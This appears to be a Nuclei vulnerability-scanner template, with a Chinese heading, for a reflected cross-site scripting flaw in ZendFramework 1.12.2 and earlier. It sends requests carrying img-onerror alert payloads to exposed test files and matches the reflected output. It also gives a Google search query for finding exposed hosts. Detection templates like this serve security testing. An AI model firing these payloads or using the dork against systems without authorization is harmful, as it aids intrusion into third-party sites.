漏洞描述
ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
id: zend-v1-xss
info:
name: ZendFramework 1.12.2 - Cross-Site Scripting
author: c3l3si4n
severity: medium
description: |
ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
reference:
- https://twitter.com/c3l3si4n/status/1600035722148212737
classification:
cpe: cpe:2.3:a:zend:zend_framework:1.12.2:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: zend
product: zend_framework
google-query: inurl:"/tests/Zend/Http/"
tags: zend,zendframework,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(1)>"
- "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3¶m=<img/src=x%20onerror=alert(document.domain)>"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"redirection"]'
- '"param"'
- '<img/src=x onerror=alert(document.domain)'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a004630440220254b43810c5688e423a52e9c2e66b18b5e4a0d2b169fc3113e74fce17f58c732022003e79206f806b60a67f1ff7a08488a02b58f6b3e6baaf3434f194b945540c38a:922c64590222798bb761d5b6d8e72950